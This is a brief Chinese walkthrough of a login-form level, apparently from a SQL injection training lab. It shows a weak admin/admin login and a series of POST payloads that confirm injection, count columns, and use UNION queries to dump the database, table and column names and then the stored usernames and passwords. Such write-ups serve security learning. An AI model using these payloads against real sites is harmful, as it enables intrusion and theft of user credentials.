这关开始就变成登录画面了
先来尝试一个弱口令,用户admin密码admin,登录成功:
用burpsuite抓包进行接下来的操作
判断出是单引号字符型注入:
uname=admin'#&passwd=&submit=Submit
判断列数:
uname=admin'+order+by+2#&passwd=&submit=Submit
爆库:
uname=-admin'+union+select+database(),version()#&passwd=&submit=Submit
爆表:
uname=-admin'+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()#&passwd=&submit=Submit
爆列:
uname=-admin'+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name='users'#&passwd=&submit=Submit
爆数据:
uname=-admin'+union+select+1,group_concat(username,password)+from+users#&passwd=&submit=Submit
